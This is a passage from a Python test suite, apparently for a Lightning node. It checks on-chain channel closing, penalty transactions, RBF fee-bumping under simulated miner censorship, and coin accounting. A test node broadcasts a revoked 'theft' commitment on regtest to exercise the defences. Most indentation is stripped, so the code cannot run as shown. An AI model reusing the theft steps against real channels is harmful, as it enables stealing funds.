l2.daemon.wait_for_log('Propose handling OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
# l3 comes back up, sees cheat, penalizes l2 (revokes the htlc they've offered;
# notes that they've successfully claimed to_local and the fulfilled htlc)
l3.start()
sync_blockheight(bitcoind, [l3])
l3.daemon.wait_for_logs(['Propose handling THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/THEIR_HTLC by OUR_PENALTY_TX',
'Propose handling THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by OUR_PENALTY_TX',
'Resolved THEIR_REVOKED_UNILATERAL/OUR_HTLC by OUR_HTLC_FULFILL_TO_THEM',
'Propose handling OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM'
' by OUR_PENALTY_TX',
'Resolved OUR_HTLC_FULFILL_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by THEIR_DELAYED_CHEAT',
'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM',
'Propose handling THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM by OUR_PENALTY_TX'])
# Make sure we've broadcast the tx we expect (other channels shutting down can create
# unrelated txs!)
# In theory this could have occurred before all the previous loglines appeared.
l3.daemon.logsearch_start = 0
line = l3.daemon.wait_for_log(r'Broadcasting OUR_PENALTY_TX \([0-9a-f]*\) to resolve THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM')
tx = re.search(r'\(([0-9a-f]*)\)', line).group(1)
txid = bitcoind.rpc.decoderawtransaction(tx)['txid']
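    # Mine it, waiting specifically for that txid so an unrelated broadcast
    # can't satisfy the wait.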
bitcoind.generate_block(1, wait_for_mempool=[txid])
l3.daemon.wait_for_log('Resolved THEIR_HTLC_TIMEOUT_TO_THEM/DELAYED_CHEAT_OUTPUT_TO_THEM '
'by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Unknown spend of OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks later, l3+l2 are both done
bitcoind.generate_block(100)
l3.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l2.info['id']))
l2.daemon.wait_for_log('{}.*: onchaind complete, forgetting peer'.format(l3.info['id']))
assert account_balance(l3, channel_id) == 0
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'F'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('external', ['penalized'], None, None)],
'E': [('cid1', ['htlc_tx'], ['to_wallet'], 'G')],
'F': [('wallet', ['deposit'], None, None)],
'G': [('wallet', ['deposit'], None, None)]
}
expected_3 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('wallet', ['channel_close'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'E'), ('external', ['stolen'], None, None), ('external', ['htlc_timeout'], ['htlc_timeout'], 'C')],
'C': [('cid1', ['penalty'], ['to_wallet'], 'D')],
'D': [('wallet', ['deposit'], None, None)],
'E': [('external', ['stolen'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_3['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
expected_3['B'].append(('wallet', ['anchor'], None, None))
tags = check_utxos_channel(l2, [channel_id], expected_2, filter_channel=channel_id)
check_utxos_channel(l3, [channel_id], expected_3, tags, filter_channel=channel_id)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_normal(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding thord
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
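    # From here on, every broadcast l2 attempts is silently swallowed by the
    # mocked backend, simulating the censoring miners; l2 will keep
    # fee-bumping (RBF) its penalty txs while censored.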
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
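    # Helper: wait for the 'Broadcasting RBF ...' log line at the given depth
    # and return the raw tx hex captured in the parentheses.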
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 8):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
        # l2 should RBF twice: once for the l1 main output,
        # once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the order in which l2 generated RBF transactions
# would be acceptable to Bitcoin.
for tx in rbf_txes:
        # Broadcast these via l2's RPC so the bcli interface
        # gets exercised as well.
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# And l2 should consider it in its listfunds.
assert(len(l2.rpc.listfunds()['outputs']) >= 1)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('wallet', ['deposit'], None, None)]
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
@pytest.mark.developer("uses dev_sign_last_tx")
def test_penalty_rbf_burn(node_factory, bitcoind, executor, chainparams):
'''
Test that penalty transactions are RBFed and we are willing to burn
it all up to spite the thief.
'''
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
to_self_delay = 10
# l1 is the thief, which causes our honest upstanding thord
# code to break, so l1 can fail.
# Initially, disconnect before the HTLC can be resolved.
l1 = node_factory.get_node(options={'dev-disable-commit-after': 1},
may_fail=True, allow_broken_log=True)
l2 = node_factory.get_node(options={'dev-disable-commit-after': 1,
'watchtime-blocks': to_self_delay,
'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**7)
channel_id = first_channel_id(l1, l2)
# Trigger an HTLC being added.
t = executor.submit(l1.pay, l2, 1000000 * 1000)
# Make sure the channel is still alive.
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# Wait for the disconnection.
l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
l2.daemon.wait_for_log('dev-disable-commit-after: disabling')
# Make sure l1 gets the new HTLC.
l1.daemon.wait_for_log('got commitsig')
# l1 prepares a theft commitment transaction
theft_tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Now continue processing until fulfilment.
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Wait for the fulfilment.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now payment should complete.
t.result(timeout=10)
# l1 goes offline and bribes the miners to censor transactions from l2.
l1.rpc.stop()
def censoring_sendrawtx(r):
return {'id': r['id'], 'result': {}}
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', censoring_sendrawtx)
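    # As in test_penalty_rbf_normal: swallow l2's broadcasts to simulate
    # censorship.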
# l1 now performs the theft attack!
bitcoind.rpc.sendrawtransaction(theft_tx)
bitcoind.generate_block(1)
# l2 notices.
l2.daemon.wait_for_log(' to ONCHAIN')
def get_rbf_tx(self, depth, name, resolve):
r = self.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
.format(name, resolve, depth))
return re.search(r'.* \(([0-9a-fA-F]*)\)', r).group(1)
rbf_txes = []
# Now the censoring miners generate some blocks.
for depth in range(2, 10):
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
        # l2 should RBF twice: once for the l1 main output,
        # once for the l1 HTLC output.
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC'))
rbf_txes.append(get_rbf_tx(l2, depth,
'OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM'))
# Now that the transactions have high fees, independent miners
# realize they can earn potentially more money by grabbing the
# high-fee censored transactions, and fresh, non-censoring
# hashpower arises, evicting the censor.
l2.daemon.rpcproxy.mock_rpc('sendrawtransaction', None)
# Check that the last two txes can be broadcast.
# These should donate the total amount to miners.
rbf_txes = rbf_txes[-2:]
for tx in rbf_txes:
l2.rpc.call('sendrawtransaction', [tx, True])
# Now the non-censoring miners overpower the censoring miners.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l2])
# And l2 should consider it resolved now.
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX')
l2.daemon.wait_for_log('Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX')
# l2 donated it to the miners, so it owns nothing
assert(len(l2.rpc.listfunds()['outputs']) == 0)
assert account_balance(l2, channel_id) == 0
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('cid1', ['penalty'], ['to_miner'], 'C'), ('cid1', ['penalty'], ['to_miner'], 'D')],
}
if anchor_expected():
expected_2['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
check_utxos_channel(l2, [channel_id], expected_2)
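# The two tests above define the same get_rbf_tx helper inline. A minimal
# sketch of how it could be hoisted to module scope (hypothetical name
# wait_for_rbf_broadcast; not wired into the tests in this file):
def wait_for_rbf_broadcast(node, depth, name, resolve):
    """Return the raw tx hex `node` logged when RBF-bumping `name` at `depth`."""
    line = node.daemon.wait_for_log('Broadcasting RBF {} .* to resolve {} depth={}'
                                    .format(name, resolve, depth))
    return re.search(r'.* \(([0-9a-fA-F]*)\)', line).group(1)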
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where opener immediately drops to chain"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
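    # (dev_disconnect codes: '+MSG'/'-MSG' appear to mean disconnect just
    # after/before sending MSG, and 'permfail' permanently fails the channel
    # so it drops to chain)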
# Make locktime different, as we once had them reversed!
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'plugin': coin_mvt_plugin},
{'watchtime-blocks': 10,
'plugin': coin_mvt_plugin}],
fundchannel=False)
l1.fundwallet(10**7)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
channel_id = first_channel_id(l1, l2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And thord should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['bech32'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'watchtime-blocks': 201, 'cltv-delta': 101,
'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500)},
{'watchtime-blocks': 201, 'cltv-delta': 101}])
inv = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1, wait_for_mempool=1)
    # Wait for nodes to notice the failure; this search needle is after the
    # DB commit, so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Must be dust!
inv = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')
rhash = inv['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'])
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_1 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'D')],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)]
}
expected_2 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
# We use a subset of tags in expected_2 that are used in expected_1
tags = check_utxos_channel(l1, [channel_id], expected_1)
# Passing the same tags in to the check again will verify that the
    # txids 'unify' across both event sets (in other words, we're talking
    # about the same txs when we say 'A' in each)
check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_simple(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
mine_funding_to_announce(bitcoind, [l1, l2, l3])
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
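    # try_pay runs in a daemon thread so the test can drive the force close
    # while the payment is in flight; any exception is handed back through
    # the queue and re-raised below.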
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
# Graph of coin_move events we expect
expected_2 = {
'0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
# This is ugly, but this wallet deposit is either unspent or used
# in the next channel open
'A': [('wallet', ['deposit'], ((['withdrawal'], 'F'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
'1': [('wallet', ['deposit'], ['withdrawal'], 'F')],
'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('external', ['to_them'], None, None)],
'C': [('wallet', ['deposit'], None, None)],
'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
'E': [('wallet', ['deposit'], None, None)],
'F': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
}
expected_1 = {
'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('wallet', ['channel_close'], None, None)]
}
if anchor_expected():
expected_1['B'].append(('external', ['anchor'], None, None))
expected_2['B'].append(('external', ['anchor'], None, None))
expected_1['B'].append(('wallet', ['anchor'], None, None))
expected_2['B'].append(('wallet', ['anchor'], None, None))
